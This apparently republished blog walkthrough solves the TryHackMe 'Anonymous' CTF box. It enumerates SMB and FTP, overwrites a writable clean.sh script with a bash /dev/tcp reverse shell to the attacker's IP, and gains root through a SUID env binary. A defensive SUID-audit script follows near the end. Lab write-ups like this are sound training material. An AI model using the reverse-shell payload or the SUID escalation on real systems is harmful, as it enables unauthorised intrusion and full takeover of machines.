TryHackMe Anonymous Challenge Walkthrough: Medium-Level SMB, FTP Exploitation & Privilege…
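This article details how to solve the medium-difficulty CTF challenge "Anonymous" on the TryHackMe platform through Nmap scanning, SMB enumeration, FTP exploitation, and SUID binary privilege escalation. 2025-9-7 14:42:14 Author: infosecwriteups.com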

Prajwal

Introduction

In this walkthrough, I’ll share my approach to solving “Anonymous,” a medium-difficulty Capture The Flag challenge from TryHackMe. This box emphasizes service enumeration, SMB share exploitation, and privilege escalation through Linux misconfigurations. Whether you’re a budding penetration tester or looking to refine your skills, this step-by-step guide will walk you through my process and techniques.


Step 1: Port Scanning and Service Discovery

The first phase was to identify active services and open ports on the target machine. I initiated a thorough scan using Nmap:

nmap -sCV -vv <target-ip>


Nmap not only revealed detailed information about service versions but also showed that four ports were open on the machine.

  • Port 21: FTP
  • Port 22: SSH
  • Ports 139, 445: SMB


Step 2: Enumerating SMB Shares

With SMB services identified on ports 139 and 445, the next move was to enumerate available shares on the machine. SMB enumeration can reveal shared resources that might contain sensitive information or allow further access.

To list the shares, I used the following command:

smbclient -L <target-ip>

When prompted, I entered:

  • Password: anonymous


Step 3: Exploring FTP and Retrieving Files

After enumerating SMB shares, I focused on the FTP service running on port 21 to look for accessible files and directories.

I connected to FTP using:

ftp <target-ip>

For the login, I used:

  • Name: anonymous
  • Password: anonymous


Listing the files with ls revealed a directory named scripts. Within this directory, I discovered a file called clean.sh. To analyze its contents and potential for exploitation, I downloaded it to my local machine:

get clean.sh


Step 4: Editing and Re-uploading for a Reverse Shell

With clean.sh downloaded locally, the next step was to edit it and inject a reverse shell payload, leveraging the script’s execution for remote access.

I opened the script with a text editor:

sudo nano clean.sh


Then, I modified the contents to include:

#!/bin/bash
bash -i >& /dev/tcp/<tryhackme-openvpn-ip>/4444 0>&1

After saving the changes, I reconnected to the FTP server and prepared to upload the modified script.

put clean.sh

Before uploading, I started a Netcat listener on my system to catch the incoming connection:

nc -lnvp 4444

Once ready, I uploaded the modified clean.sh back to the server and waited for execution. When triggered, my listener received the reverse shell, granting interactive access to the target machine.


Step 5: Capturing the First Flag

With an interactive shell established, I navigated through the system to search for user-level flags.

Using the reverse shell, I listed files within the home or relevant directories:

ls

This revealed the first flag file, which I promptly captured. Achieving initial shell access and retrieving user flags is a fundamental milestone in any CTF challenge.


Step 6: Privilege Escalation Using SUID Binaries

To elevate privileges, I searched for files with the SUID bit set that are owned by root. These files can sometimes be exploited to gain higher privileges.

I ran the following command:

find / -user root -perm -u=s 2>/dev/null


One interesting file caught my attention: /usr/bin/env.

By executing:

env /bin/sh -p

I was able to spawn a root shell, successfully escalating my privileges.

This was the final step, allowing me to capture the root flag and complete the challenge.
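
From the defender's side, the same find search can feed a baseline check so that a SUID bit on a command launcher such as /usr/bin/env is reported before anyone uses it. This is an added example, not part of the original walkthrough; the function names and the NEVER_SUID and BASELINE lists are constructed for illustration and are not exhaustive.

```shell
#!/bin/sh
# Added example: audit SUID-root binaries against a baseline.
# NEVER_SUID and BASELINE are constructed lists; adapt them to your own image.

# Programs whose job is to run another command or interpret code. A SUID bit
# on any of them gives the file owner's privileges to every local user.
NEVER_SUID="env sh bash dash zsh python python3 perl ruby"

# SUID binaries expected on a stock install (constructed sample baseline).
BASELINE="/usr/bin/passwd /usr/bin/sudo /usr/bin/su /usr/bin/mount \
/usr/bin/umount /usr/bin/chsh /usr/bin/chfn /usr/bin/newgrp /usr/bin/gpasswd"

# classify_suid: read one path per line on stdin and print a verdict for each
# path outside the baseline. Returns 1 if anything was reported, else 0.
classify_suid() {
    cs_found=0
    while IFS= read -r cs_path; do
        [ -n "$cs_path" ] || continue
        cs_name=${cs_path##*/}
        # Launchers and interpreters are always critical, wherever they live.
        case " $NEVER_SUID " in
            *" $cs_name "*)
                printf 'CRITICAL %s\n' "$cs_path"
                cs_found=1
                continue ;;
        esac
        # Anything else must match the baseline exactly by full path.
        case " $BASELINE " in
            *" $cs_path "*) ;;
            *)
                printf 'REVIEW %s\n' "$cs_path"
                cs_found=1 ;;
        esac
    done
    return "$cs_found"
}

# scan_suid: the search from Step 6, limited to regular files on one
# filesystem, piped into the classifier. Defaults to scanning from /.
scan_suid() {
    find "${1:-/}" -xdev -type f -user root -perm -u=s 2>/dev/null | classify_suid
}
```

Run `scan_suid /` from a scheduled job and alert on a non-zero exit status; a CRITICAL finding is remediated by clearing the bit with `chmod u-s` on the reported file.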

Conclusion

The “Anonymous” TryHackMe box provides an engaging medium-level challenge that ties together essential penetration testing skills: thorough enumeration, SMB share exploration, FTP exploitation, and privilege escalation through SUID binaries. The journey from gaining initial access to escalating privileges offers valuable hands-on experience for aspiring cybersecurity professionals.

Thank you for reading this walkthrough. Stay tuned for more detailed guides, and happy hacking! 😊


Article source: https://infosecwriteups.com/tryhackme-anonymous-challenge-walkthrough-medium-level-smb-ftp-exploitation-privilege-9afbd652eccb?source=rss----7b722bfd1b8d---4